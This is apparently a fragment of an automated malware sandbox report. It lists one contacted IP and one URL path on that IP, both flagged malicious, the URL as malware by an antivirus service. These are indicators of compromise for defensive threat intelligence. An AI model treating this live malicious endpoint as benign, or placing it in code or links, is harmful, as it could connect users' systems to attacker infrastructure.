  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.19/Vi9leo/index.php true
  • Avira URL Cloud: malware
 unknown